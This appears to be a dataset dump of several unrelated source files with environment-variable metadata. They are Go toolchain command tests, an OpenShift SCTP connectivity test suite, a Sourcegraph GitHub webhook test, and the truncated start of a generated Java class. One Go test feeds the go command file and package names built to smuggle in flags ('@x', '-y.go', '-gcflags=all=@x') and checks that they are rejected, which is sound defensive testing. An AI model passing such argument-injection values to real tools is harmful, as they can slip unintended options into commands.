// don't let install -i overwrite runtime
tg.wantNotStale("runtime", "", "must be non-stale before install -i")
tg.run("install", "-i", "main1")
tg.mustExist(p1)
tg.must(os.Remove(p1))
tg.run("install", "-i", "p2")
tg.mustExist(p1)
}
// Issue 22986.
func TestImportPath(t *testing.T) {
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("src/a/a.go", `
package main
import (
"log"
p "a/p-1.0"
)
func main() {
if !p.V {
log.Fatal("false")
}
}`)
tg.tempFile("src/a/a_test.go", `
package main_test
import (
p "a/p-1.0"
"testing"
)
func TestV(t *testing.T) {
if !p.V {
t.Fatal("false")
}
}`)
tg.tempFile("src/a/p-1.0/p.go", `
package p
var V = true
func init() {}
`)
tg.setenv("GOPATH", tg.path("."))
tg.run("build", "-o", tg.path("a.exe"), "a")
tg.run("test", "a")
}
func TestBadCommandLines(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("src/x/x.go", "package x\n")
tg.setenv("GOPATH", tg.path("."))
tg.run("build", "x")
tg.tempFile("src/x/@y.go", "package x\n")
tg.runFail("build", "x")
tg.grepStderr("invalid input file name \"@y.go\"", "did not reject @y.go")
tg.must(os.Remove(tg.path("src/x/@y.go")))
tg.tempFile("src/x/-y.go", "package x\n")
tg.runFail("build", "x")
tg.grepStderr("invalid input file name \"-y.go\"", "did not reject -y.go")
tg.must(os.Remove(tg.path("src/x/-y.go")))
if runtime.Compiler == "gccgo" {
tg.runFail("build", "-gccgoflags=all=@x", "x")
} else {
tg.runFail("build", "-gcflags=all=@x", "x")
}
tg.grepStderr("invalid command-line argument @x in command", "did not reject @x during exec")
tg.tempFile("src/@x/x.go", "package x\n")
tg.setenv("GOPATH", tg.path("."))
tg.runFail("build", "@x")
tg.grepStderr("invalid input directory name \"@x\"|can only use path@version syntax with 'go get' and 'go install' in module-aware mode", "did not reject @x directory")
tg.tempFile("src/@x/y/y.go", "package y\n")
tg.setenv("GOPATH", tg.path("."))
tg.runFail("build", "@x/y")
tg.grepStderr("invalid import path \"@x/y\"|can only use path@version syntax with 'go get' and 'go install' in module-aware mode", "did not reject @x/y import path")
tg.tempFile("src/-x/x.go", "package x\n")
tg.setenv("GOPATH", tg.path("."))
tg.runFail("build", "--", "-x")
tg.grepStderr("invalid import path \"-x\"", "did not reject -x import path")
tg.tempFile("src/-x/y/y.go", "package y\n")
tg.setenv("GOPATH", tg.path("."))
tg.runFail("build", "--", "-x/y")
tg.grepStderr("invalid import path \"-x/y\"", "did not reject -x/y import path")
}
func TestTwoPkgConfigs(t *testing.T) {
if !canCgo {
t.Skip("no cgo")
}
if runtime.GOOS == "windows" || runtime.GOOS == "plan9" {
t.Skipf("no shell scripts on %s", runtime.GOOS)
}
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("src/x/a.go", `package x
// #cgo pkg-config: --static a
import "C"
`)
tg.tempFile("src/x/b.go", `package x
// #cgo pkg-config: --static a
import "C"
`)
tg.tempFile("pkg-config.sh", `#!/bin/sh
echo $* >>`+tg.path("pkg-config.out"))
tg.must(os.Chmod(tg.path("pkg-config.sh"), 0755))
tg.setenv("GOPATH", tg.path("."))
tg.setenv("PKG_CONFIG", tg.path("pkg-config.sh"))
tg.run("build", "x")
out, err := os.ReadFile(tg.path("pkg-config.out"))
tg.must(err)
out = bytes.TrimSpace(out)
want := "--cflags --static --static -- a a\n--libs --static --static -- a a"
if !bytes.Equal(out, []byte(want)) {
t.Errorf("got %q want %q", out, want)
}
}
func TestCgoCache(t *testing.T) {
if !canCgo {
t.Skip("no cgo")
}
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("src/x/a.go", `package main
// #ifndef VAL
// #define VAL 0
// #endif
// int val = VAL;
import "C"
import "fmt"
func main() { fmt.Println(C.val) }
`)
tg.setenv("GOPATH", tg.path("."))
exe := tg.path("x.exe")
tg.run("build", "-o", exe, "x")
tg.setenv("CGO_LDFLAGS", "-lnosuchlibraryexists")
tg.runFail("build", "-o", exe, "x")
tg.grepStderr(`nosuchlibraryexists`, "did not run linker with changed CGO_LDFLAGS")
}
// Issue 23982
func TestFilepathUnderCwdFormat(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.run("test", "-x", "-cover", "log")
tg.grepStderrNot(`\.log\.cover\.go`, "-x output should contain correctly formatted filepath under cwd")
}
// Issue 24396.
func TestDontReportRemoveOfEmptyDir(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("src/a/a.go", `package a`)
tg.setenv("GOPATH", tg.path("."))
tg.run("install", "-x", "a")
tg.run("install", "-x", "a")
// The second install should have printed only a WORK= line,
// nothing else.
if bytes.Count(tg.stdout.Bytes(), []byte{'\n'})+bytes.Count(tg.stderr.Bytes(), []byte{'\n'}) > 1 {
t.Error("unnecessary output when installing installed package")
}
}
// Issue 24704.
func TestLinkerTmpDirIsDeleted(t *testing.T) {
skipIfGccgo(t, "gccgo does not use cmd/link")
if !canCgo {
t.Skip("skipping because cgo not enabled")
}
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("a.go", `package main; import "C"; func main() {}`)
tg.run("build", "-ldflags", "-v", "-o", os.DevNull, tg.path("a.go"))
// Find line that has "host link:" in linker output.
stderr := tg.getStderr()
var hostLinkLine string
for _, line := range strings.Split(stderr, "\n") {
if !strings.Contains(line, "host link:") {
continue
}
hostLinkLine = line
break
}
if hostLinkLine == "" {
t.Fatal(`failed to find line with "host link:" string in linker output`)
}
// Find parameter, like "/tmp/go-link-408556474/go.o" inside of
// "host link:" line, and extract temp directory /tmp/go-link-408556474
// out of it.
tmpdir := hostLinkLine
i := strings.Index(tmpdir, `go.o"`)
if i == -1 {
t.Fatalf(`fail to find "go.o" in "host link:" line %q`, hostLinkLine)
}
tmpdir = tmpdir[:i-1]
i = strings.LastIndex(tmpdir, `"`)
if i == -1 {
t.Fatalf(`fail to find " in "host link:" line %q`, hostLinkLine)
}
tmpdir = tmpdir[i+1:]
// Verify that temp directory has been removed.
_, err := os.Stat(tmpdir)
if err == nil {
t.Fatalf("temp directory %q has not been removed", tmpdir)
}
if !os.IsNotExist(err) {
t.Fatalf("Stat(%q) returns unexpected error: %v", tmpdir, err)
}
}
// Issue 25093.
func TestCoverpkgTestOnly(t *testing.T) {
skipIfGccgo(t, "gccgo has no cover tool")
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("src/a/a.go", `package a
func F(i int) int {
return i*i
}`)
tg.tempFile("src/atest/a_test.go", `
package a_test
import ( "a"; "testing" )
func TestF(t *testing.T) { a.F(2) }
`)
tg.setenv("GOPATH", tg.path("."))
tg.run("test", "-coverpkg=a", "atest")
tg.grepStderrNot("no packages being tested depend on matches", "bad match message")
tg.grepStdout("coverage: 100", "no coverage")
}
// Regression test for golang.org/issue/34499: version command should not crash
// when executed in a deleted directory on Linux.
func TestExecInDeletedDir(t *testing.T) {
switch runtime.GOOS {
case "windows", "plan9",
"aix", // Fails with "device busy".
"solaris", "illumos": // Fails with "invalid argument".
t.Skipf("%v does not support removing the current working directory", runtime.GOOS)
}
tg := testgo(t)
defer tg.cleanup()
wd, err := os.Getwd()
tg.check(err)
tg.makeTempdir()
tg.check(os.Chdir(tg.tempdir))
defer func() { tg.check(os.Chdir(wd)) }()
tg.check(os.Remove(tg.tempdir))
// `go version` should not fail
tg.run("version")
}
// A missing C compiler should not force the net package to be stale.
// Issue 47215.
func TestMissingCC(t *testing.T) {
if !canCgo {
t.Skip("test is only meaningful on systems with cgo")
}
cc := os.Getenv("CC")
if cc == "" {
cc = "gcc"
}
if filepath.IsAbs(cc) {
t.Skipf(`"CC" (%s) is an absolute path`, cc)
}
_, err := exec.LookPath(cc)
if err != nil {
t.Skipf(`"CC" (%s) not on PATH`, cc)
}
tg := testgo(t)
defer tg.cleanup()
netStale, _ := tg.isStale("net")
if netStale {
t.Skip(`skipping test because "net" package is currently stale`)
}
tg.setenv("PATH", "") // No C compiler on PATH.
netStale, _ = tg.isStale("net")
if netStale {
t.Error(`clearing "PATH" causes "net" to be stale`)
}
}
| [
"\"GO_GCFLAGS\"",
"\"PATH\"",
"\"GOPATH\"",
"\"GODEBUG\"",
"\"GODEBUG\"",
"\"GODEBUG\"",
"\"GODEBUG\"",
"\"GODEBUG\"",
"\"CC\""
]
| []
| [
"GO_GCFLAGS",
"CC",
"GOPATH",
"GODEBUG",
"PATH"
]
| [] | ["GO_GCFLAGS", "CC", "GOPATH", "GODEBUG", "PATH"] | go | 5 | 0 | |
functests/sctp/sctp.go | package sctp
import (
"fmt"
"io/ioutil"
"os"
"strings"
"time"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
mcfgv1 "github.com/openshift/machine-config-operator/pkg/apis/machineconfiguration.openshift.io/v1"
mcfgScheme "github.com/openshift/machine-config-operator/pkg/generated/clientset/versioned/scheme"
k8sv1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/util/intstr"
"github.com/openshift-kni/cnf-features-deploy/functests/utils/client"
"github.com/openshift-kni/cnf-features-deploy/functests/utils/execute"
"github.com/openshift-kni/cnf-features-deploy/functests/utils/namespaces"
"k8s.io/utils/pointer"
)
const mcYaml = "../sctp/sctp_module_mc.yaml"
const hostnameLabel = "kubernetes.io/hostname"
const testNamespace = "sctptest"
var (
testerImage string
sctpNodeSelector string
)
func init() {
testerImage = os.Getenv("SCTPTEST_IMAGE")
if testerImage == "" {
testerImage = "quay.io/fpaoline/sctptester:v1.0"
}
sctpNodeSelector = os.Getenv("SCTPTEST_NODE_SELECTOR")
if sctpNodeSelector == "" {
sctpNodeSelector = "node-role.kubernetes.io/worker-cnf="
}
}
var _ = Describe("sctp", func() {
execute.BeforeAll(func() {
err := namespaces.Create(testNamespace, client.Client)
Expect(err).ToNot(HaveOccurred())
err = namespaces.Clean(testNamespace, client.Client)
Expect(err).ToNot(HaveOccurred())
})
var _ = Describe("sctp setup", func() {
var clientNode string
var serverNode string
var _ = Describe("Negative - Sctp disabled", func() {
execute.BeforeAll(func() {
By("Validate that SCTP present of cluster.")
checkForSctpReady(client.Client)
})
BeforeEach(func() {
By("Choosing the nodes for the server and the client")
nodes, err := client.Client.Nodes().List(metav1.ListOptions{
LabelSelector: "node-role.kubernetes.io/worker,!" + strings.Replace(sctpNodeSelector, "=", "", -1),
})
Expect(err).ToNot(HaveOccurred())
Expect(len(nodes.Items)).To(BeNumerically(">", 0))
clientNode = nodes.Items[0].ObjectMeta.Labels[hostnameLabel]
serverNode = nodes.Items[0].ObjectMeta.Labels[hostnameLabel]
if len(nodes.Items) > 1 {
serverNode = nodes.Items[1].ObjectMeta.Labels[hostnameLabel]
}
createSctpService(client.Client)
})
Context("Client Server Connection", func() {
// OCP-26995
It("Should NOT connect a client pod to a server pod", func() {
By("Starting the server")
serverArgs := []string{"-ip", "0.0.0.0", "-port", "30101", "-server"}
pod := scptTestPod("scptserver", serverNode, "sctpserver", serverArgs)
pod.Spec.Containers[0].Ports = []k8sv1.ContainerPort{
k8sv1.ContainerPort{
Name: "sctpport",
Protocol: k8sv1.ProtocolSCTP,
ContainerPort: 30101,
},
}
serverPod, err := client.Client.Pods(testNamespace).Create(pod)
Expect(err).ToNot(HaveOccurred())
By("Fetching the server's ip address")
Eventually(func() k8sv1.PodPhase {
runningPod, err := client.Client.Pods(testNamespace).Get(serverPod.Name, metav1.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return runningPod.Status.Phase
}, 1*time.Minute, 1*time.Second).Should(Equal(k8sv1.PodFailed))
})
AfterEach(func() {
namespaces.Clean("sctptest", client.Client)
deleteService(client.Client)
})
})
})
var _ = Describe("Test Connectivity", func() {
var activeService *k8sv1.Service
var runningPod *k8sv1.Pod
var serverPod *k8sv1.Pod
var nodes *k8sv1.NodeList
var err error
execute.BeforeAll(func() {
checkForSctpReady(client.Client)
})
BeforeEach(func() {
By("Choosing the nodes for the server and the client")
nodes, err = client.Client.Nodes().List(metav1.ListOptions{
LabelSelector: sctpNodeSelector,
})
Expect(err).ToNot(HaveOccurred())
Expect(len(nodes.Items)).To(BeNumerically(">", 0))
clientNode = nodes.Items[0].ObjectMeta.Labels[hostnameLabel]
serverNode = nodes.Items[0].ObjectMeta.Labels[hostnameLabel]
if len(nodes.Items) > 1 {
serverNode = nodes.Items[1].ObjectMeta.Labels[hostnameLabel]
}
activeService = createSctpService(client.Client)
By("Starting the server")
serverArgs := []string{"-ip", "0.0.0.0", "-port", "30101", "-server"}
pod := scptTestPod("scptserver", serverNode, "sctpserver", serverArgs)
pod.Spec.Containers[0].Ports = []k8sv1.ContainerPort{
k8sv1.ContainerPort{
Name: "sctpport",
Protocol: k8sv1.ProtocolSCTP,
ContainerPort: 30101,
},
}
serverPod, err = client.Client.Pods(testNamespace).Create(pod)
Expect(err).ToNot(HaveOccurred())
By("Fetching the server's ip address")
Eventually(func() k8sv1.PodPhase {
runningPod, err = client.Client.Pods(testNamespace).Get(serverPod.Name, metav1.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return runningPod.Status.Phase
}, 3*time.Minute, 1*time.Second).Should(Equal(k8sv1.PodRunning))
})
Context("Client Server Connection", func() {
// OCP-26759
It("Kernel Module is loaded", func() {
checkForSctpReady(client.Client)
})
// OCP-26760
It("Should connect a client pod to a server pod", func() {
testClientServerConnection(client.Client, runningPod.Status.PodIP,
activeService.Spec.Ports[0].Port, clientNode, serverPod.Name)
})
// OCP-26763
It("Should connect a client pod to a server pod. Feature LatencySensitive Active", func() {
fg, err := client.Client.FeatureGates().Get("cluster", metav1.GetOptions{})
Expect(err).ToNot(HaveOccurred())
if fg.Spec.FeatureSet == "LatencySensitive" {
testClientServerConnection(client.Client, runningPod.Status.PodIP,
activeService.Spec.Ports[0].Port, clientNode, serverPod.Name)
} else {
Skip("Feature LatencySensitive is not ACTIVE")
}
})
// OCP-26761
It("Should connect a client pod to a server pod via Service ClusterIP", func() {
testClientServerConnection(client.Client, activeService.Spec.ClusterIP,
activeService.Spec.Ports[0].Port, clientNode, serverPod.Name)
})
// OCP-26762
It("Should connect a client pod to a server pod via Service NodeIP", func() {
testClientServerConnection(client.Client, nodes.Items[0].Status.Addresses[0].Address,
activeService.Spec.Ports[0].Port, clientNode, serverPod.Name)
})
})
AfterEach(func() {
deleteService(client.Client)
namespaces.Clean("sctptest", client.Client)
})
})
})
})
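// loadMC reads the SCTP MachineConfig manifest from mcYaml and decodes it into an mcfgv1.MachineConfig.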
func loadMC() *mcfgv1.MachineConfig {
decode := mcfgScheme.Codecs.UniversalDeserializer().Decode
mcoyaml, err := ioutil.ReadFile(mcYaml)
Expect(err).ToNot(HaveOccurred())
obj, _, err := decode([]byte(mcoyaml), nil, nil)
Expect(err).ToNot(HaveOccurred())
mc, ok := obj.(*mcfgv1.MachineConfig)
Expect(ok).To(Equal(true))
return mc
}
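// checkForSctpReady schedules a checksctp pod on every node matching sctpNodeSelector
// and waits for all of them to succeed, confirming the SCTP kernel module is loaded.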
func checkForSctpReady(cs *client.ClientSet) {
nodes, err := cs.Nodes().List(metav1.ListOptions{
LabelSelector: sctpNodeSelector,
})
Expect(err).ToNot(HaveOccurred())
Expect(len(nodes.Items)).To(BeNumerically(">", 0))
args := []string{`set -x; x="$(checksctp 2>&1)"; echo "$x" ; if [ "$x" = "SCTP supported" ]; then echo "succeeded"; exit 0; else echo "failed"; exit 1; fi`}
for _, n := range nodes.Items {
job := jobForNode("checksctp", n.ObjectMeta.Labels[hostnameLabel], "checksctp", []string{"/bin/bash", "-c"}, args)
cs.Pods(testNamespace).Create(job)
}
Eventually(func() bool {
pods, err := cs.Pods(testNamespace).List(metav1.ListOptions{LabelSelector: "app=checksctp"})
ExpectWithOffset(1, err).ToNot(HaveOccurred())
for _, p := range pods.Items {
if p.Status.Phase != k8sv1.PodSucceeded {
return false
}
}
return true
}, 3*time.Minute, 10*time.Second).Should(Equal(true))
}
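// testClientServerConnection launches an SCTP client pod on clientNode that connects to
// destIP:port and then waits for the server pod to complete successfully.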
func testClientServerConnection(cs *client.ClientSet, destIP string, port int32, clientNode string, serverPodName string) {
By("Connecting a client to the server")
clientArgs := []string{"-ip", destIP, "-port",
fmt.Sprint(port), "-lport", "30102"}
clientPod := scptTestPod("sctpclient", clientNode, "sctpclient", clientArgs)
cs.Pods(testNamespace).Create(clientPod)
Eventually(func() k8sv1.PodPhase {
pod, err := cs.Pods(testNamespace).Get(serverPodName, metav1.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return pod.Status.Phase
}, 1*time.Minute, 1*time.Second).Should(Equal(k8sv1.PodSucceeded))
}
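// createSctpService exposes the SCTP server pods (app=sctpserver) through a NodePort service on SCTP port 30101.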
func createSctpService(cs *client.ClientSet) *k8sv1.Service {
service := k8sv1.Service{
ObjectMeta: metav1.ObjectMeta{
Name: "sctpservice",
Namespace: testNamespace,
},
Spec: k8sv1.ServiceSpec{
Selector: map[string]string{
"app": "sctpserver",
},
Ports: []k8sv1.ServicePort{
k8sv1.ServicePort{
Protocol: k8sv1.ProtocolSCTP,
Port: 30101,
NodePort: 30101,
TargetPort: intstr.IntOrString{
Type: intstr.Int,
IntVal: 30101,
},
},
},
Type: "NodePort",
},
}
activeService, err := cs.Services(testNamespace).Create(&service)
Expect(err).ToNot(HaveOccurred())
return activeService
}
func deleteService(cs *client.ClientSet) {
err := cs.Services(testNamespace).Delete("sctpservice", &metav1.DeleteOptions{
GracePeriodSeconds: pointer.Int64Ptr(0)})
Expect(err).ToNot(HaveOccurred())
}
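// scptTestPod builds a pod spec that runs /usr/bin/sctptest from testerImage with the given args,
// pinned to the given node through the hostname label selector.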
func scptTestPod(name, node, app string, args []string) *k8sv1.Pod {
res := k8sv1.Pod{
ObjectMeta: metav1.ObjectMeta{
GenerateName: name,
Labels: map[string]string{
"app": app,
},
Namespace: testNamespace,
},
Spec: k8sv1.PodSpec{
RestartPolicy: k8sv1.RestartPolicyNever,
Containers: []k8sv1.Container{
{
Name: name,
Image: testerImage,
Command: []string{"/usr/bin/sctptest"},
Args: args,
},
},
NodeSelector: map[string]string{
hostnameLabel: node,
},
},
}
return &res
}
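// jobForNode builds a one-shot pod spec that runs the given command on the named node;
// checkForSctpReady uses it to probe SCTP support.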
func jobForNode(name, node, app string, cmd []string, args []string) *k8sv1.Pod {
job := k8sv1.Pod{
ObjectMeta: metav1.ObjectMeta{
GenerateName: name,
Labels: map[string]string{
"app": app,
},
Namespace: testNamespace,
},
Spec: k8sv1.PodSpec{
RestartPolicy: k8sv1.RestartPolicyNever,
Containers: []k8sv1.Container{
{
Name: name,
Image: testerImage,
Command: cmd,
Args: args,
},
},
NodeSelector: map[string]string{
hostnameLabel: node,
},
},
}
return &job
}
| [
"\"SCTPTEST_IMAGE\"",
"\"SCTPTEST_NODE_SELECTOR\""
]
| []
| [
"SCTPTEST_NODE_SELECTOR",
"SCTPTEST_IMAGE"
]
| [] | ["SCTPTEST_NODE_SELECTOR", "SCTPTEST_IMAGE"] | go | 2 | 0 | |
enterprise/internal/campaigns/webhooks_test.go | package campaigns
import (
"bytes"
"context"
"crypto/hmac"
"crypto/sha256"
"database/sql"
"encoding/hex"
"encoding/json"
"flag"
"io/ioutil"
"net/http"
"net/http/httptest"
"net/http/httputil"
"os"
"path/filepath"
"strings"
"testing"
"time"
"github.com/dnaeon/go-vcr/cassette"
"github.com/google/go-cmp/cmp"
gh "github.com/google/go-github/github"
"github.com/sourcegraph/sourcegraph/cmd/repo-updater/repos"
"github.com/sourcegraph/sourcegraph/internal/campaigns"
"github.com/sourcegraph/sourcegraph/internal/extsvc/github"
"github.com/sourcegraph/sourcegraph/internal/httpcli"
"github.com/sourcegraph/sourcegraph/internal/httptestutil"
"github.com/sourcegraph/sourcegraph/internal/rcache"
"github.com/sourcegraph/sourcegraph/schema"
)
var update = flag.Bool("update", false, "update testdata")
// Ran in integration_test.go
func testGitHubWebhook(db *sql.DB) func(*testing.T) {
return func(t *testing.T) {
now := time.Now()
clock := func() time.Time {
return now.UTC().Truncate(time.Microsecond)
}
now = clock()
ctx := context.Background()
rcache.SetupForTest(t)
cf, save := newGithubClientFactory(t, "github-webhooks")
defer save()
var userID int32
err := db.QueryRow("INSERT INTO users (username) VALUES ('admin') RETURNING id").Scan(&userID)
if err != nil {
t.Fatal(err)
}
secret := "secret"
repoStore := repos.NewDBStore(db, sql.TxOptions{})
githubExtSvc := &repos.ExternalService{
Kind: "GITHUB",
DisplayName: "GitHub",
Config: marshalJSON(t, &schema.GitHubConnection{
Url: "https://github.com",
Token: os.Getenv("GITHUB_TOKEN"),
Repos: []string{"oklog/ulid"},
Webhooks: []*schema.GitHubWebhook{{Org: "oklog", Secret: secret}},
}),
}
err = repoStore.UpsertExternalServices(ctx, githubExtSvc)
if err != nil {
t.Fatal(err)
}
githubSrc, err := repos.NewGithubSource(githubExtSvc, cf)
if err != nil {
t.Fatal(err)
}
githubRepo, err := githubSrc.GetRepo(ctx, "oklog/ulid")
if err != nil {
t.Fatal(err)
}
err = repoStore.UpsertRepos(ctx, githubRepo)
if err != nil {
t.Fatal(err)
}
store := NewStoreWithClock(db, clock)
campaign := &campaigns.Campaign{
Name: "Test campaign",
Description: "Testing THE WEBHOOKS",
AuthorID: userID,
NamespaceUserID: userID,
}
err = store.CreateCampaign(ctx, campaign)
if err != nil {
t.Fatal(err)
}
changesets := []*campaigns.Changeset{
{
RepoID: githubRepo.ID,
ExternalID: "16",
ExternalServiceType: githubRepo.ExternalRepo.ServiceType,
CampaignIDs: []int64{campaign.ID},
},
}
err = store.CreateChangesets(ctx, changesets...)
if err != nil {
t.Fatal(err)
}
syncer := ChangesetSyncer{
ReposStore: repoStore,
Store: store,
HTTPFactory: cf,
}
err = syncer.SyncChangesets(ctx, changesets...)
if err != nil {
t.Fatal(err)
}
_, err = db.Exec("DELETE FROM changeset_events")
if err != nil {
t.Fatal(err)
}
fs := loadFixtures(t)
hook := NewGitHubWebhook(store, repoStore, clock)
issueComment := github.IssueComment{
DatabaseID: 540540777,
Author: github.Actor{
AvatarURL: "https://avatars2.githubusercontent.com/u/67471?v=4",
Login: "tsenart",
URL: "https://api.github.com/users/tsenart",
},
Editor: &github.Actor{
AvatarURL: "https://avatars2.githubusercontent.com/u/67471?v=4",
Login: "tsenart",
URL: "https://api.github.com/users/tsenart",
},
AuthorAssociation: "CONTRIBUTOR",
Body: "A comment on an old event. Aaaand it was updated. Twice. Thrice. Four times even.",
URL: "https://api.github.com/repos/oklog/ulid/issues/comments/540540777",
CreatedAt: parseTimestamp(t, "2019-10-10T12:06:54Z"),
UpdatedAt: parseTimestamp(t, "2019-10-10T12:15:20Z"),
IncludesCreatedEdit: true,
}
events := []*campaigns.ChangesetEvent{
{
ID: 7,
ChangesetID: changesets[0].ID,
Kind: campaigns.ChangesetEventKindGitHubCommented,
Key: "540540777",
CreatedAt: now,
UpdatedAt: now,
Metadata: func() interface{} {
m := issueComment
return &m
}(),
},
}
for _, tc := range []struct {
name string
secret string
event event
code int
want []*campaigns.ChangesetEvent
}{
{
name: "unauthorized",
secret: "wrong-secret",
event: fs["issue_comment-edited"],
code: http.StatusUnauthorized,
want: []*campaigns.ChangesetEvent{},
},
{
name: "non-existent-changeset",
secret: secret,
event: func() event {
e := fs["issue_comment-edited"]
clone := *(e.event.(*gh.IssueCommentEvent))
issue := *clone.Issue
clone.Issue = &issue
nonExistingPRNumber := 999999
issue.Number = &nonExistingPRNumber
return event{name: e.name, event: &clone}
}(),
code: http.StatusOK,
want: []*campaigns.ChangesetEvent{},
},
{
name: "non-existent-changeset-event",
secret: secret,
event: fs["issue_comment-edited"],
code: http.StatusOK,
want: events,
},
{
name: "existent-changeset-event",
secret: secret,
event: func() event {
e := fs["issue_comment-edited"]
clone := *(e.event.(*gh.IssueCommentEvent))
comment := *clone.Comment
clone.Comment = &comment
body := "Foo bar"
comment.Body = &body
return event{name: e.name, event: &clone}
}(),
code: http.StatusOK,
want: func() []*campaigns.ChangesetEvent {
m := issueComment
m.Body = "Foo bar"
e := events[0].Clone()
e.Metadata = &m
return []*campaigns.ChangesetEvent{e}
}(),
},
} {
tc := tc
t.Run(tc.name, func(t *testing.T) {
body, err := json.Marshal(tc.event.event)
if err != nil {
t.Fatal(err)
}
req, err := http.NewRequest("POST", "", bytes.NewReader(body))
if err != nil {
t.Fatal(err)
}
req.Header.Set("X-Github-Event", tc.event.name)
req.Header.Set("X-Hub-Signature", sign(t, body, []byte(tc.secret)))
rec := httptest.NewRecorder()
hook.ServeHTTP(rec, req)
resp := rec.Result()
if tc.code != 0 && tc.code != resp.StatusCode {
bs, err := httputil.DumpResponse(resp, true)
if err != nil {
t.Fatal(err)
}
t.Log(string(bs))
t.Errorf("have status code %d, want %d", resp.StatusCode, tc.code)
}
have, _, err := store.ListChangesetEvents(ctx, ListChangesetEventsOpts{Limit: 1000})
if err != nil {
t.Fatal(err)
}
if diff := cmp.Diff(have, tc.want); diff != "" {
t.Error(diff)
}
})
}
}
}
type event struct {
name string
event interface{}
}
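// loadFixtures parses every webhook payload under testdata/fixtures; the file name prefix
// (before the first '-') is the GitHub event name passed to gh.ParseWebHook.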
func loadFixtures(t testing.TB) map[string]event {
t.Helper()
matches, err := filepath.Glob("testdata/fixtures/*")
if err != nil {
t.Fatal(err)
}
fs := make(map[string]event, len(matches))
for _, m := range matches {
bs, err := ioutil.ReadFile(m)
if err != nil {
t.Fatal(err)
}
base := filepath.Base(m)
name := strings.TrimSuffix(base, filepath.Ext(base))
parts := strings.SplitN(name, "-", 2)
if len(parts) != 2 {
t.Fatalf("unexpected fixture file name format: %s", m)
}
ev, err := gh.ParseWebHook(parts[0], bs)
if err != nil {
t.Fatal(err)
}
fs[name] = event{name: parts[0], event: ev}
}
return fs
}
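// sign returns the GitHub-style webhook signature ("sha256=" followed by the hex HMAC-SHA256
// of message keyed with secret), as expected in the X-Hub-Signature header.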
func sign(t *testing.T, message, secret []byte) string {
t.Helper()
mac := hmac.New(sha256.New, secret)
_, err := mac.Write(message)
if err != nil {
t.Fatalf("writing hmac message failed: %s", err)
}
return "sha256=" + hex.EncodeToString(mac.Sum(nil))
}
func marshalJSON(t testing.TB, v interface{}) string {
t.Helper()
bs, err := json.Marshal(v)
if err != nil {
t.Fatal(err)
}
return string(bs)
}
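// newGithubClientFactory returns an httpcli.Factory whose transport replays (or records, with
// -update) GitHub API traffic via a go-vcr recorder under testdata/vcr; the returned cleanup
// func stops the recorder.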
func newGithubClientFactory(t testing.TB, name string) (*httpcli.Factory, func()) {
t.Helper()
cassettePath := filepath.Join("testdata/vcr/", strings.Replace(name, " ", "-", -1))
rec, err := httptestutil.NewRecorder(cassettePath, *update, func(i *cassette.Interaction) error {
return nil
})
if err != nil {
t.Fatal(err)
}
mw := httpcli.NewMiddleware(githubProxyRedirectMiddleware)
hc := httpcli.NewFactory(mw, httptestutil.NewRecorderOpt(rec))
return hc, func() {
if err := rec.Stop(); err != nil {
t.Errorf("failed to update test data: %s", err)
}
}
}
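// githubProxyRedirectMiddleware rewrites requests aimed at the internal github-proxy host
// so they are sent directly to https://api.github.com.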
func githubProxyRedirectMiddleware(cli httpcli.Doer) httpcli.Doer {
return httpcli.DoerFunc(func(req *http.Request) (*http.Response, error) {
if req.URL.Hostname() == "github-proxy" {
req.URL.Host = "api.github.com"
req.URL.Scheme = "https"
}
return cli.Do(req)
})
}
func parseTimestamp(t testing.TB, ts string) time.Time {
t.Helper()
timestamp, err := time.Parse(time.RFC3339, ts)
if err != nil {
t.Fatal(err)
}
return timestamp
}
| [
"\"GITHUB_TOKEN\""
]
| []
| [
"GITHUB_TOKEN"
]
| [] | ["GITHUB_TOKEN"] | go | 1 | 0 | |
src/com.mentor.nucleus.bp.core/src/com/mentor/nucleus/bp/core/DescriptionEngine_c.java | package com.mentor.nucleus.bp.core;
//====================================================================
//
// File: com.mentor.nucleus.bp.core.DescriptionEngine_c.java
//
// WARNING: Do not edit this generated file
// Generated by ../MC-Java/java.arc, $Revision: 1.111 $
//
// (c) Copyright 2005-2014 by Mentor Graphics Corp. All rights reserved.
//
//====================================================================
// No special imports
import java.util.*;
import java.lang.reflect.*;
import org.eclipse.core.resources.IFile;
import org.eclipse.core.resources.IResource;
import org.eclipse.core.runtime.IAdaptable;
import org.eclipse.core.runtime.IPath;
import org.eclipse.core.runtime.Path;
import com.mentor.nucleus.bp.core.util.PersistenceUtil;
import org.eclipse.core.runtime.NullProgressMonitor;
import com.mentor.nucleus.bp.core.ui.marker.UmlProblem;
import com.mentor.nucleus.bp.core.common.*;
abstract class EV_DESCRIPTION_ENGINE extends genericEvent_c {
public abstract int getEvtcode();
}
public class DescriptionEngine_c extends NonRootModelElement
implements
IAdaptable,
Cloneable {
// Public Constructors
public DescriptionEngine_c(ModelRoot modelRoot, java.util.UUID p_m_id) {
super(modelRoot);
//pre-process the uuid so that we re-use null uuid instance rather then creating a new one.
m_id = IdAssigner.preprocessUUID(p_m_id);
Object[] key = {m_id};
addInstanceToMap(key);
}
static public DescriptionEngine_c createProxy(ModelRoot modelRoot,
java.util.UUID p_m_id, String p_contentPath, IPath p_localPath) {
ModelRoot resolvedModelRoot = ModelRoot.findModelRoot(modelRoot,
p_contentPath, p_localPath);
// if a model root was not resolved it is most likely
// due to a missing file of the proxy, defualt back to
// the original model root
if (resolvedModelRoot != null)
modelRoot = resolvedModelRoot;
InstanceList instances = modelRoot
.getInstanceList(DescriptionEngine_c.class);
DescriptionEngine_c new_inst = null;
synchronized (instances) {
Object[] key = {p_m_id};
new_inst = (DescriptionEngine_c) instances.get(key);
